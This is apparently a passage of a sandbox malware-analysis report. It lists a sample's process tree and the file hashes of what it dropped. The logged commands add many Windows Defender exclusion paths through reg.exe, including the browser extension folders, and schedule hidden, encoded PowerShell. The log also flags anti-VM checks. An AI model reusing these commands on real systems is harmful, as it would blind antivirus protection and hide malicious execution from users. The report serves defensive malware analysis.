                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:532
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:1576
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4104
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:1628
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4664
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:7032
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:5816
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:6832
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5184
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:7040
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:2376
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:6276
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:6596
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:5324
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:6696
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "gosYWNTEx" /SC once /ST 00:34:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                          PID:6136
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks /run /I /tn "gosYWNTEx"
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:3100
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                          PID:2664
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                          PID:2776
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:3480
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                            PID:6380
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:6620
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:5588

                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                              • C:\ProgramData\ECAFHDBGHJKFIDHJJJEBKEBGIE

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                20KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                a603e09d617fea7517059b4924b1df93

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                31d66e1496e0229c6a312f8be05da3f813b3fa9e

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

                                                                                                                                                                                                                                                                                              • C:\ProgramData\EHJKJDGCGDAKFHIDBGCB

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                349e6eb110e34a08924d92f6b334801d

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                bdfb289daff51890cc71697b6322aa4b35ec9169

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\1000021002\f7da420337.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                4080ccbe1cc150b027dbf9ff268ae7bd

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                9d377e813724f2090ad1d61bf772c923a8289039

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                c81a59520ee84e367d2d9bcca612864affca70b5fc64ee15dc4ace6708c32420

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                7007b3db46038b52ba4c52e7b5b80ae7d13f82ddeafc250ae97bf6616775317cdd4692742e627919a1fd993542f8a951f1debb27c44a7ba28d8b6e8bf3a457af

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2.1MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                5a38cae12b97476949d630a35988ee2e

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                03efd20e06d21aec7c2f86b6b937281472de3c1c

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                0785847f4236fa31944255f5405ee7c5b13ac0628226405d610ade42f4afafa6

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                156d00cac54e90e0156fa01a411936fcc3bdcc72cf02722f432b569059184aab4f99248da3aefef39796aab5f198bbbf91c1a33b04a1fa15b783769bef828492

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\LameXP\libeay32.dll

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                1176a2fcbc3cfb77207db7575dd6a522

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                e0a854c77a65e542712c9fe3feae2331fcddb7f4

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                553200e21658e7976d496c52cc1aeb50446b877ccda4f0b073a553ec3fb48560

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                bb00340e4931342c4db499d68e98542f401a985c062810225ee661a7a289a885dab8c64f37fb231212ad2a5d703f3fd0528e8402fc1033cf4128d075714e3f34

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                4280e36a29fa31c01e4d8b2ba726a0d8

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\9f46d750-e2b5-41d7-9fe4-b82d549a9ed0.tmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                49a1196c57a85aaec2ebdb07fad76ab0

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                a4d5ef5ec19897c3d43734dfdff413dc14dcf430

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                03a8302ca60e69096d146fb8fcd6a0806c92258cc3c3178e829bfd5a86a0e3fe

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                4afce16c3380e6a552c06fea36bdf9e2cdd9f2ded038f6e9f7cb2e34cf2130773a8aab0ded210cba0041dbc9dbb36a84623a0dec4cf550e94456cfac69fa3b85

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                a9e55f5864d6e2afd2fd84e25a3bc228

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                a5efcff9e3df6252c7fe8535d505235f82aab276

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                0f4df3120e4620555916be8e51c29be8d600d68ae5244efad6a0268aabc8c452

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                12f45fa73a6de6dfe17acc8b52b60f2d79008da130730b74cc138c1dcd73ccc99487165e3c8c90dc247359fde272f1ec6b3cf2c5fcb04e5093936144d0558b75

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                dbac49e66219979194c79f1cf1cb3dd1

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                4ef87804a04d51ae1fac358f92382548b27f62f2

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                f24ed6c5bf4b734a9af4d64e14a80a160bea569f50849f70bf7b7277c4f48562

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                bb314d61f53cf7774f6dfb6b772c72f5daf386bc3d27d2bb7a14c65848ee86e6c48e9c5696693ded31846b69b9372a530175df48494e3d61a228e49d43401ad1

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                960B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                59373d90dbcc2b9281f3ee036fbd8be1

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                367c8c0b14cb744dfd3b25dda7323f4bdf388566

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                e3d6b667f64e28023dd29e1e69245c6edf1028bbaaa25d3eb75de40dff2a90df

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                4d2cc50de1445e812f0ccc40e05609ff9382804cec46f8165333a7e33f35ff76c5f37b29fd0b30721ccd07ad3ee03d42bbefcff1cde71a5b607730b953768cc2

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                af6ee4ee80828d4b4a5492414b5a170c

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                55e41844e8250b21e2af1f0c0c725ac9d263afca

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                0caa765569d4f2e77d7c11e0e68ae048110f4222271b69f5fce8830e7d9fd210

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                7dd284c8b808114931f404b0c9ba702ef83af36eeab0e082a6b2d84524fb4fd5bdd1e30f52b782730cce467572e309b73a528a278a404dce434f7f0f3356308c

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                5e598908a5ba6e7f7c11be37e833302a

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                348de7c2a20fbfcd3e02a5879f31fc4545c2be04

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                520f82cd3046f581508811ce6c29ac3c1d62cbab45e88df9aa592b4a425fe58d

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                a2140a1237e4460db10f395dbd56763b992631e527bc8365ffd13049f7c3840449007a2899c49648802278258537a3a1ecb0ef1e2bf8a13c0450580483eaa0e8

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                1bd4e2fab6818208400c1cf86ba00330

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                e605575b6c0195f6cec15cf6e561576eb8f33594

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                9669f76481e3ad91b22652c506de3abe8df24caaed7057c2dc509c37821dbaa2

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                eda3fcf26f5091d467739166ce464447d403a051d59f0cb53cc63d381a7aa3bbe61e9cb1ba02a32269db3ee277ec8eac8d91d864a33cbc86ae4cca8a9c244d2d

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                9b7e11bb61d7145ff4c9c21643bdedca

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                f3f8138407fca89a2444aa4b0b01988d27a729cc

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                a65bed5c9ddd9f6b8f73542106069f35a29490763aa3c39f8d98bfc5706732bc

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                6368c78cb77a90f76e5b3191e670b67187a92399ac53b6e704a73e9a7f05ff47914ce0a390b7c5caa7a434e283aa8975d34267eccd11f869416c8bf2620029f8

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                5053110a276db1ae023e911639c95d8e

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                48ff3c5e7560f678df2bae3df6af677b0ed5a422

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                0b2131afd638d5de839ee1501f37a4e5c34222877f2ec7bdb3d8fec939a68993

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                55b62e20aaed48374757b127bdc84a80be0d762713df047a85ace06736c3c2c681b021d03b00731a66f779bbb6309d5e303c359e63c7113712001b6f87442c45

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                69898ae361da21f919095170dffab3cc

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                059c95d0a06410c2943c26b4e53cd785d4b63f51

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                bc4a97f2420aff1d8159686e63240663e4fd221cc97b0577811fdf149f0daacf

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                3c351f620464d856eb3f9b9a3e2ae0f90f53776d7255c4c8d352e6a425b3686c8f8d397126ee5c0c3651fc82dddda5de246f7fc9e1ab47ca1667fb17cc44eaed

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                707B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b303c3d3c3e3e4dc6f68b1f7ce983c70

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                e04420f6ebb2dd9fbec1e8a8d14bb103568cd29d

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                a6c8c36fe558a96548d62c204c2f281b83425c9ae68034caaf3df4b3cde64ce9

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                1d583f7c04e177c11124c9323b37cff3560be286e1839f6dcab7fdacdca7f0023ba3d4843605e65af904d05a51909baf3aa69845b79a2a7bd57e99b353055129

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                707B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                66ab5274faf4e69f65d2bfd4eb5378bf

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                4d1cda63db1a02e134a4588a0a869759427adafe

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                597b3dc38054b5251685d521d8246ffcd9dcbbd4afd9648470f7af6ef5b062f3

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                14ad97b72debf480c7f3eddcfdbbde177416cdb853171f1ba32b1d5ba7093826b3e09b99ecd4045d1fb7582279b85b0958823a8b080d602240c53abc8b06c8a3

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                707B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                e0299cddfd2790c85c0c3d15ec70f66f

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                76617cc3562f9841e1f60174323974853e1803a5

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                3b1ae266b4cef8cedd13cacb19d39198f85a466a2ed483ba575893ce0583da86

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                1213d7d55eef0daf2fba29717322488aacc7a203a8c8764f0952747c9b4be8cc4b8a971d9750941897b010ff5b8adf05e16d9e4bc41168a6e5efc28c8c9adadf

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588f1c.TMP

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                539B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                2fee0acbb952ec2c2ca68cb6f2abea08

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                e421c8ed60072ecae004ca8bc19085e29dffd2fc

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                f3f8439383b63097b55fad481b05d6ed400804986eb3e69a11ae65238a16a8c6

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                c5d6df1812a1c92dc1cc3417de197c8aafbc35feb2f7edcf42de0840988f6aa4a8002ac2861a9155a1c9550e7033b26d4b6d2b3fbe9a221cc37177bc2b7d0ab3

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                16B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

